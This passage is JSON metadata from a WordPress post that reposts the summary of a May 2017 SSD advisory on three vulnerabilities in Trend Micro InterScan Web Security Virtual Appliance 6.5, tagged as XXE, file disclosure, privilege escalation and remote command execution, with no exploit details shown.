style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\" alt=\"Print Friendly\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3050\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 25 May 2017 11:52:44 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes three (3) vulnerabilities found in Trend Micro Interscan Web Security Virtual Appliance\u00a0version 6.5. &#8220;The Trend Micro Hybrid Cloud Security solution, powered by XGen security, delivers a blend of cross-generational threat defense techniques that have been optimized to protect physical, virtual, and cloud workloads.&#8221; The vulnerabilities found in Trend Micro &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3050\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Trend Micro Interscan Web Security Virtual Appliance Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11681,11591,11946,11851,10757],"class_list":["post-7787","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-external-entity-xxe","tag-file-disclosure","tag-privilege-escalation","tag-remote-command-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7787","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7787"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7787\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7787"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7787"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7787"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}